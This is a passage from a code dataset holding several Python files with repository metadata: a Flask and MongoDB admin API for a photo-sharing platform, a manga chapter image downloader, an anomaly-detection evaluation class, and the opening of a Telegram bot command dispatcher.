\"video\"]:\n return response(msg=\"Bad Request: Params 'type' is erroe.\", code=1, status=400)\n # 查询\n pipeline = [\n {\n \"$match\": {\n \"type\" if type != \"default\" else \"null\": \\\n ({\"$in\": [\"tp\", \"tj\"]} if type == \"pic\" else \"yj\") if type != \"default\" else None,\n \"state\": 2, \"is_recommend\": is_recommend\n }\n },\n {\"$skip\": (int(page) - 1) * int(num)},\n {\"$limit\": int(num)},\n {\n \"$lookup\": {\n \"from\": \"user\",\n \"let\": {\"user_id\": \"$user_id\"},\n \"pipeline\": [{\"$match\": {\"$expr\": {\"$eq\": [\"$uid\", \"$$user_id\"]}}}],\n \"as\": \"user_item\"\n }\n },\n {\"$addFields\": {\"user_info\": {\"$arrayElemAt\": [\"$user_item\", 0]}}},\n {\"$addFields\": {\"author\": \"$user_info.nick\"}},\n {\"$unset\": [\"user_item\", \"user_info\"]},\n {\n \"$project\": {\n \"_id\": 0, \"uid\": 1, \"title\": 1, \"type\": 1, \"author\": 1, \"browse_num\": 1,\n \"create_time\": {\n \"$dateToString\": {\n \"format\": \"%Y-%m-%d %H:%M\",\n \"date\": {\"$add\": [init_stamp, \"$create_time\"]}\n }\n }\n }\n }\n ]\n cursor = client[\"works\"].aggregate(pipeline)\n condition = {\n \"type\" if type != \"default\" else \"null\": \\\n ({\"$in\": [\"tp\", \"tj\"]} if type == \"pic\" else \"yj\") if type != \"default\" else None,\n \"state\": 2, \"is_recommend\": is_recommend\n }\n count = client[\"works\"].find(condition).count()\n data_list = [doc for doc in cursor]\n data[\"count\"] = count\n data[\"list\"] = data_list if data_list else []\n return data\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef get_platform_info(uid=\"001\"):\n \"\"\"\n 平台定价信息\n :param uid: 官方定价信息uid\n \"\"\"\n data = {}\n try:\n # 查询\n pipeline = [\n {\"$match\": {\"uid\": uid}},\n {\n \"$project\": {\n \"_id\": 0, \"price\": 1,\n \"format\": {\n \"$cond\": {\n \"if\": {\"$eq\": [\"$format\", \"扩大授权\"]},\n \"then\": \"k_price\",\n \"else\": {\"$concat\": [{\"$toLower\": \"$format\"}, \"_price\"]}\n }\n }\n }\n },\n ]\n cursor = client[\"price\"].aggregate(pipeline)\n for doc in cursor:\n data.update({doc[\"format\"]: doc[\"price\"]})\n cursor = client[\"bank\"].find({\"state\": 1})\n fees_list = [doc for doc in cursor]\n fees = fees_list[0][\"fees\"] if fees_list else 0\n data.update({\"fees\": fees})\n return response(data=data)\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef post_platform_pricing(uid=\"001\"):\n \"\"\"\n 平台定价\n :param uid: 官方定价信息uid\n \"\"\"\n try:\n s_price = request.json.get(\"s_price\")\n m_price = request.json.get(\"m_price\")\n l_price = request.json.get(\"l_price\")\n k_price = request.json.get(\"k_price\")\n fees = request.json.get(\"fees\")\n\n # 校验\n error = None\n if not s_price:\n error = \"请输入S规格价格\"\n elif not m_price:\n error = \"请输入M规格价格\"\n elif not l_price:\n error = \"请输入L规格价格\"\n elif not k_price:\n error = \"请输入扩大授权规格价格\"\n elif not fees:\n error = \"请输入手续费\"\n elif fees > 100:\n error = \"手续费最高100\"\n elif not any([isinstance(s_price, int), isinstance(s_price, float)]):\n error = \"请输入S规格有效价格\"\n elif not any([isinstance(m_price, int), isinstance(m_price, float)]):\n error = \"请输入M规格有效价格\"\n elif not any([isinstance(l_price, int), isinstance(l_price, float)]):\n error = \"请输入L规格有效价格\"\n elif not any([isinstance(k_price, int), isinstance(k_price, float)]):\n error = \"请输入扩大规格有效价格\"\n elif not any([isinstance(fees, int), isinstance(fees, float)]):\n error = \"请输入有效的手续费\"\n\n if error:\n return response(msg=error, code=1)\n\n client[\"price\"].update({\"format\": \"S\", \"uid\": uid}, {\"$set\": {\"price\": float(s_price)}})\n client[\"price\"].update({\"format\": \"M\", \"uid\": uid}, {\"$set\": {\"price\": float(m_price)}})\n client[\"price\"].update({\"format\": \"L\", \"uid\": uid}, {\"$set\": {\"price\": float(l_price)}})\n client[\"price\"].update({\"format\": \"扩大授权\", \"uid\": uid}, {\"$set\": {\"price\": float(k_price)}})\n client[\"bank\"].update({\"state\": 1}, {\"$set\": {\"fees\": float(fees)}}, multi=True)\n return response()\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef get_recomm_works_list():\n \"\"\"推荐作品列表\"\"\"\n try:\n data = works_list_api(True)\n return response(data=data)\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef put_recomm_state():\n \"\"\"删除推荐作品\"\"\"\n try:\n # 参数\n works_id = request.json.get(\"works_id\")\n if not works_id:\n return response(msg=\"Bad Request: Miss params: 'works_id'.\", code=1, status=400)\n # 更新\n doc = client[\"works\"].update({\"uid\": works_id}, {\"$set\": {\"is_recommend\": False}})\n if doc[\"n\"] == 0:\n return response(msg=\"Bad Request: Update failed.\", code=1, status=400)\n return response()\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef get_option_works_list():\n \"\"\"作品选择列表\"\"\"\n try:\n data = works_list_api(False)\n return response(data=data)\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef get_option_works_list_search(delta_time=30):\n \"\"\"\n 作品选择列表搜索\n :param delta_time: 允许查询的最大区间30天\n \"\"\"\n data = {}\n try:\n # 参数\n content = request.args.get(\"content\")\n category = request.args.get(\"category\") # 标题传title, 作者传author\n type = request.args.get(\"type\") # 发现传default, 微图传pic, 影集传video\n num = request.args.get(\"num\")\n page = request.args.get(\"page\")\n start_time = request.args.get(\"start_time\")\n end_time = request.args.get(\"end_time\")\n start_time = start_time + \" 00:00:00\"\n end_time = end_time + \" 23:59:59\"\n timeArray1 = datetime.datetime.strptime(start_time, \"%Y-%m-%d %H:%M:%S\")\n timeArray2 = datetime.datetime.strptime(end_time, \"%Y-%m-%d %H:%M:%S\")\n start_time = int(time.mktime(timeArray1.timetuple()) * 1000)\n end_time = int(time.mktime(timeArray2.timetuple()) * 1000)\n # 校验参数\n if not num:\n return response(msg=\"Bad Request: Miss params: 'num'.\", code=1, status=400)\n if not page:\n return response(msg=\"Bad Request: Miss params: 'page'.\", code=1, status=400)\n if int(page) < 1 or int(num) < 1:\n return response(msg=\"Bad Request: Params 'page' or 'num' is erroe.\", code=1, status=400)\n if content and category not in [\"title\", \"author\"]:\n return response(msg=\"Bad Request: Params 'category' is erroe.\", code=1, status=400)\n if type not in [\"default\", \"pick\", \"video\"]:\n return response(msg=\"Bad Request: Params 'type' is erroe.\", code=1, status=400)\n if not start_time:\n return response(msg=\"Bad Request: Miss params: 'start_time'.\", code=1, status=400)\n if not end_time:\n return response(msg=\"Bad Request: Miss params: 'end_time'.\", code=1, status=400)\n if (int(end_time) - int(start_time)) // (24 * 3600 * 1000) > delta_time:\n return response(msg=f\"最多可连续查询{delta_time}天以内的作品\", code=1)\n if len(content) > constant.SEARCH_MAX:\n return response(msg=f\"搜索字数上限{constant.SEARCH_MAX}\", code=1)\n\n pipeline = [\n {\n \"$match\": {\n \"type\" if type != \"default\" else \"null\": \\\n ({\"$in\": [\"tp\", \"tj\"]} if type == \"pic\" else \"yj\") if type != \"default\" else None,\n \"state\": 2, \"is_recommend\": False,\n (\"title\" if category == \"title\" else \"nick\") if content else \"null\": \\\n {\"$regex\": content} if content else None,\n \"$and\": [{\"create_time\": {\"$gte\": int(start_time)}}, {\"create_time\": {\"$lte\": int(end_time)}}]\n }\n },\n {\"$skip\": (int(page) - 1) * int(num)},\n {\"$limit\": int(num)},\n {\n \"$lookup\": {\n \"from\": \"user\",\n \"let\": {\"user_id\": \"$user_id\"},\n \"pipeline\": [{\"$match\": {\"$expr\": {\"$eq\": [\"$uid\", \"$$user_id\"]}}}],\n \"as\": \"user_item\"\n }\n },\n {\"$addFields\": {\"user_info\": {\"$arrayElemAt\": [\"$user_item\", 0]}}},\n {\"$addFields\": {\"author\": \"$user_info.nick\"}},\n {\n \"$project\": {\n \"_id\": 0, \"uid\": 1, \"title\": 1, \"type\": 1, \"author\": 1, \"browse_num\": 1,\n \"create_time\": {\n \"$dateToString\": {\n \"format\": \"%Y-%m-%d %H:%M\",\n \"date\": {\"$add\": [init_stamp, \"$create_time\"]}\n }\n }\n }\n }\n ]\n cursor = client[\"works\"].aggregate(pipeline)\n data_list = [doc for doc in cursor]\n condition = {\n \"type\" if type != \"default\" else \"null\": \\\n ({\"$in\": [\"tp\", \"tj\"]} if type == \"pic\" else \"yj\") if type != \"default\" else None,\n \"state\": 2, \"is_recommend\": False,\n (\"title\" if category == \"title\" else \"nick\") if content else \"null\": \\\n {\"$regex\": content} if content else None,\n \"$and\": [{\"create_time\": {\"$gte\": int(start_time)}}, {\"create_time\": {\"$lte\": int(end_time)}}]\n }\n count = client[\"works\"].find(condition).count()\n data[\"count\"] = count\n data[\"list\"] = data_list if data_list else []\n return response(data=data)\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef post_add_recomm_works(upload_max=10):\n \"\"\"\n 添加推荐作品\n :param upload_max: 允许同时上传作品的上限值\n \"\"\"\n try:\n # 获取参数\n works_list = request.json.get(\"works_list\")\n if not works_list:\n return response(msg=\"Bad Request: Miss params: 'works_list'.\", code=1, status=400)\n # 最大上传10个\n if len(works_list) > upload_max:\n return response(msg=f\"最多允许选择{upload_max}个作品\", code=1)\n doc = client[\"works\"].update({\"uid\": {\"$in\": works_list}}, {\"$set\": {\"is_recommend\": True}}, multi=True)\n if doc[\"n\"] == 0:\n return response(msg=\"Bad Request: Update failed.\", code=1, status=400)\n return response()\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n", "repo_name": "coinsccg/microfotos", "sub_path": "controller/admin/operate/admin_operating_api.py", "file_name": "admin_operating_api.py", "file_ext": "py", "file_size_in_byte": 13191, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.request.args.get", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 30, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 32, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 34, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 36, "usage_type": "call"}, {"api_name": "initialize.init_stamp", "line_number": 65, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 71, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 77, "usage_type": "name"}, {"api_name": "initialize.log.error", "line_number": 83, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 83, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 84, "usage_type": "call"}, {"api_name": "initialize.client", "line_number": 110, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 113, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 117, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 119, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 119, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 120, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 129, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 129, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 130, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 131, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 131, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 133, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 133, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 133, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 161, "usage_type": "call"}, {"api_name": "initialize.client", "line_number": 163, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 164, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 165, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 166, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 167, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 168, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 170, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 170, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 171, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 178, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 180, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 180, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 188, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 188, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 188, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 190, "usage_type": "call"}, {"api_name": "initialize.client", "line_number": 192, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 194, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 195, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 197, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 197, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 198, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 205, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 207, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 207, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 208, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 219, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 219, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 219, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 220, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 220, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 220, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 221, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 221, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 221, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 222, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 222, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 222, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 223, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 223, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 223, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 224, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 224, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 224, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 225, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 225, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 225, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 228, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 228, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 229, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 229, "usage_type": "attribute"}, {"api_name": "time.mktime", "line_number": 230, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 231, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 234, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 236, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 238, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 240, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 242, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 244, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 246, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 248, "usage_type": "call"}, {"api_name": "constant.constant.SEARCH_MAX", "line_number": 249, "usage_type": "attribute"}, {"api_name": "constant.constant", "line_number": 249, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 250, "usage_type": "call"}, {"api_name": "constant.constant.SEARCH_MAX", "line_number": 250, "usage_type": "attribute"}, {"api_name": "constant.constant", "line_number": 250, "usage_type": "name"}, {"api_name": "initialize.init_stamp", "line_number": 281, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 287, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 297, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 300, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 302, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 302, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 303, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 313, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 313, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 313, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 315, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 318, "usage_type": "call"}, {"api_name": "initialize.client", "line_number": 319, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 321, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 322, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 324, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 324, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 325, "usage_type": "call"}]} +{"seq_id": "35043696826", "text": "import requests\nfrom PIL import Image\nimport os\nimport re\nfrom colors import bcolors\nfrom colorama import init\nfrom termcolor import cprint\nimport math\ninit()\n\nImage.MAX_IMAGE_PIXELS = 933120000\n\ncprint(f\"{bcolors.OKBLUE}Digite o id do manga: {bcolors.END}\")\nid_manga = input()\n\nchapters = requests.get(f'https://tsukimangas.net/api/v2/chapters/{id_manga}/all').json()\n\nfor ch in chapters:\n print(ch['number'])\ncprint(f'Selecione os caps \\n{bcolors.BOLD}EXEMPLO: 1,2,3...{bcolors.END} \\nou \\n{bcolors.BOLD}EXEMPLO: 1-10{bcolors.END}')\nchs_selects = input()\ncprint(f'{bcolors.OKBLUE}Qual é o volume? (se não tiver é só apertar enter):{bcolors.END} ')\nvol = str(input() or '')\nif(vol != ''):\n vol = f' (v{vol})'\nchs = chs_selects.split(',')\nif len(chs) == 1:\n chs = chs_selects.split('-')\n if len(chs) > 1:\n nmin = chs[0]\n nmax = chs[1]\n chs = []\n for ch in chapters:\n if float(ch['number']) >= float(nmin) and float(ch['number']) <= float(nmax):\n chs.append(ch['number'])\n\nfor ch in chs:\n for c in chapters:\n if(float(ch) == float(c['number'])):\n n = 1\n for version in c['versions']:\n for scan in version['scans']:\n if len(c['versions']) > 1:\n print(f\"{n} - {scan['scan']['name']}\")\n n += 1\n\n version = 1\n if len(c['versions']) > 1:\n cprint(f'{bcolors.OKBLUE}Selecione a versão: {bcolors.OKBLUE}')\n version = int(input())\n\n version_id = c['versions'][version-1]['id']\n\n pages = requests.get(f'https://tsukimangas.net/api/v2/chapter/versions/{version_id}').json()\n\n manga_name = (pages['chapter']['manga']['title'][:20]) if len(pages['chapter']['manga']['title']) > 20 else pages['chapter']['manga']['title']\n manga_name = re.sub('[^a-zA-Z0-9&_áàâãéèêíïóôõöúçñÁÀÂÃÉÈÊÍÏÓÔÕÖÚÇÑ-]','', manga_name)\n ch_title = ''\n if(pages['chapter']['title']): \n ch_title = \" ({0})\".format(re.sub('[^a-zA-Z0-9&_áàâãéèêíïóôõöúçñÁÀÂÃÉÈÊÍÏÓÔÕÖÚÇÑ\\s\\.-]','', pages['chapter']['title']))\n pages = pages['pages']\n ch = c['number']\n g = []\n if(len(c['versions'][version-1]['scans']) > 0):\n for scan in c['versions'][version-1]['scans']:\n g.append(re.sub(' ', '', scan['scan']['name']))\n g.append('+')\n g.pop()\n groups = \"\".join(g)\n\n if(bool(re.search(\"^0{1}\\d\", ch))):\n ch = re.sub('0','',ch)\n\n cprint(f'{bcolors.WARNING}baixando cap {ch}{bcolors.END}')\n if not os.path.isdir(os.path.join('MangaDownloads', manga_name, f'{manga_name} [pt-br] - c{ch}{vol}{ch_title} [{groups}]')):\n os.makedirs(os.path.join('MangaDownloads', manga_name, f'{manga_name} [pt-br] - c{ch}{vol}{ch_title} [{groups}]'))\n\n page_number = 1\n for page in pages:\n r = requests.get(f\"https://tsukimangas.net/img{page['url']}\", stream=True)\n if r.status_code == 200:\n r.raw.decode_content = True\n img = Image.open(r.raw)\n icc = img.info.get('icc_profile')\n if img.mode in (\"RGBA\", \"P\"): img = img.convert(\"RGB\")\n width, height = img.size\n if(height > 10000):\n top = 0\n left = 0\n slices = int(math.ceil(height/5000))\n count = 1\n for slice in range(slices):\n if count == slices:\n bottom = height\n else:\n bottom = int(count * 5000) \n\n box = (left, top, width, bottom)\n img_slice = img.crop(box)\n top += 5000\n img_slice.save(os.path.join('MangaDownloads', manga_name, f'{manga_name} [pt-br] - c{ch}{vol}{ch_title} [{groups}]', f\"%03d.jpg\" % page_number), quality=80, dpi=(72, 72), icc_profile=icc)\n cprint(f'{bcolors.OK}pagina {page_number} baixada com sucesso{bcolors.END}')\n count += 1\n page_number += 1\n else:\n img.save(os.path.join('MangaDownloads', manga_name, f'{manga_name} [pt-br] - c{ch}{vol}{ch_title} [{groups}]', f\"%03d.jpg\" % page_number), quality=80, dpi=(72, 72), icc_profile=icc)\n cprint(f'{bcolors.OK}pagina {page_number} baixada com sucesso{bcolors.END}')\n page_number += 1\n else:\n cprint(f'{bcolors.FAIL}falha ao baixar pagina {page_number} do cap {c[\"number\"]}{bcolors.END}')\n page_number += 1\n", "repo_name": "Lyem/tsuki_downloader", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5038, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "colorama.init", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image.MAX_IMAGE_PIXELS", "line_number": 11, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 11, "usage_type": "name"}, {"api_name": "termcolor.cprint", "line_number": 13, "usage_type": "call"}, {"api_name": "colors.bcolors.OKBLUE", "line_number": 13, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 13, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 13, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "termcolor.cprint", "line_number": 20, "usage_type": "call"}, {"api_name": "colors.bcolors.BOLD", "line_number": 20, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 20, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 20, "usage_type": "attribute"}, {"api_name": "termcolor.cprint", "line_number": 22, "usage_type": "call"}, {"api_name": "colors.bcolors.OKBLUE", "line_number": 22, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 22, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 22, "usage_type": "attribute"}, {"api_name": "termcolor.cprint", "line_number": 49, "usage_type": "call"}, {"api_name": "colors.bcolors.OKBLUE", "line_number": 49, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 49, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 54, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 57, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 60, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 66, "usage_type": "call"}, {"api_name": "re.search", "line_number": 71, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 72, "usage_type": "call"}, {"api_name": "termcolor.cprint", "line_number": 74, "usage_type": "call"}, {"api_name": "colors.bcolors.WARNING", "line_number": 74, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 74, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 80, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "termcolor.cprint", "line_number": 102, "usage_type": "call"}, {"api_name": "colors.bcolors.OK", "line_number": 102, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 102, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 102, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "termcolor.cprint", "line_number": 107, "usage_type": "call"}, {"api_name": "colors.bcolors.OK", "line_number": 107, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 107, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 107, "usage_type": "attribute"}, {"api_name": "termcolor.cprint", "line_number": 110, "usage_type": "call"}, {"api_name": "colors.bcolors.FAIL", "line_number": 110, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 110, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 110, "usage_type": "attribute"}]} +{"seq_id": "27922806781", "text": "from model_utils import *\nfrom utils import *\nfrom data import *\nfrom sklearn.metrics import roc_auc_score\n\nfrom c2d_models import *\n\nclass Tester:\n def __init__(\n self,\n model,\n test_data\n ):\n if not isinstance(model, str):\n self.model = model\n else:\n self.model = load_model(model)\n self.test_data = test_data\n \n def test(self, batch_size = 64, return_results = True):\n results = dict()\n normal_images = self.test_data.normal_data\n for anomaly_type, anomaly_images in self.test_data.abnormal_data.items():\n labels = np.array([self.test_data.NORMAL_LABEL] * len(normal_images) + [self.test_data.ABNORMAL_LABEL] * len(anomaly_images))\n images = np.concatenate((normal_images, anomaly_images))\n reconstructions = self.model.predict(images)\n losses = np.sum((reconstructions - images)**2, axis = (1,2,3))\n normalized = (losses - losses.min()) / (losses.max() - losses.min())\n anomaly_roc_auc_score = roc_auc_score(labels, normalized)\n results[anomaly_type] = {\n \"targets\": labels,\n \"losses\": losses,\n \"normalized\": normalized,\n \"roc_auc_score\": anomaly_roc_auc_score,\n }\n results[\"mean_roc_auc_score\"] = np.mean([results[at][\"roc_auc_score\"] for at in results.keys()])\n \n for key in results.keys():\n try: print(key, results[key][\"roc_auc_score\"])\n except: print(key, results[key])\n \n if return_results: return results\n else: return True", "repo_name": "ambareeshravi/AD_AE_XAI", "sub_path": "tester.py", "file_name": "tester.py", "file_ext": "py", "file_size_in_byte": 1655, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sklearn.metrics.roc_auc_score", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "33011046815", "text": "import tele_util, config, cmds, crab, stats\nfrom flask import Flask, request, render_template\nimport time\nimport os\n\n\nos.environ[\"TZ\"] = \"Europe/Berlin\"\ntime.tzset()\napp = Flask(__name__)\n\n\nswagbot = tele_util.startBot(config.swagbot)\nCMD_MAPPING = {\n 'zitat': cmds.zitat,\n 'gif': cmds.gif,\n 'tenor': cmds.tenor,\n 'list': cmds.list_,\n 'roulette': cmds.roulette,\n 'bit': cmds.bit,\n 'svb': cmds.sendViaBot,\n 'daily': cmds.dailyPost,\n 'roll': cmds.rollFunc,\n 'prop': cmds.props,\n 'quiz': cmds.quiz,\n 'trivia': cmds.trivia,\n 'truth': cmds.truth,\n 'dare2': cmds.dare,\n 'stats': cmds.stats,\n}\n\n@app.route(config.swagbot['hook'], methods=['POST'])\n@tele_util.tryAndLogError\ndef swagbot_hook():\n msg = tele_util.MsgUtil(swagbot, request.get_json())\n if msg and not msg.hasmsg:\n return 'OK'\n if msg.cmd in CMD_MAPPING:\n CMD_MAPPING[msg.cmd](msg)\n if 'Y' == 